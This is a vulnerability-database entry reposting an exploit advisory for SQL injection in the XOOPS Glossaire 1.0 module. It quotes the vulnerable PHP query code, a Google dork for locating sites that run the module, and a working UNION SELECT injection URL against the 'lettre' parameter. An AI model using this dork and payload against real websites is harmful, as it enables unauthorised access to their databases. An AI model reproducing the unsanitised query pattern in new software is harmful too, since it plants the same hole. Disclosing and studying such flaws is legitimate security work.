XOOPS Glossaire 1.0 SQL Injection

2014.05.19
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

Xoops Module (Glossaire v1.0) - Sql Injection Vulnerabilty =================================================================== #################################################################### .:. Author : AtT4CKxT3rR0r1ST .:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com] .:. Home : http://www.iphobos.com/blog/ .:. Script : http://www.xoops.org/ .:. Dork : inurl:"/modules/glossaire/glossaire-aff.php" #################################################################### VULNERABILITY ############## [I] /modules/glossaire/glossaire-aff.php Line 19-27: list($nbe) = $db->fetch_row($db->query("SELECT COUNT(*) FROM ".$db->prefix("glossaire")." WHERE affiche='O' AND lettre='$lettre' ORDER BY nom")); OpenTable(); echo "<B>"._GLOSSAIRE."</B><br />\n"; $TableRep = $db->query("SELECT * FROM ".$db->prefix("glossaire")." WHERE affiche='O' AND lettre='$lettre' ORDER BY nom LIMIT $debut,$nb_affichage"); $top=1; $topsuivant="glossaire-aff.php?rechercher&lettre=$lettre"; ######### EXPLOIT ######### Type: String Mysql Injection http://SITE/modules/glossaire/glossaire-aff.php?lettre=A[SQL INJECTION] http://SITE/modules/glossaire/glossaire-aff.php?lettre=A'+and+1=2+union+select+1,2,3,4,5,version()--- ####################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top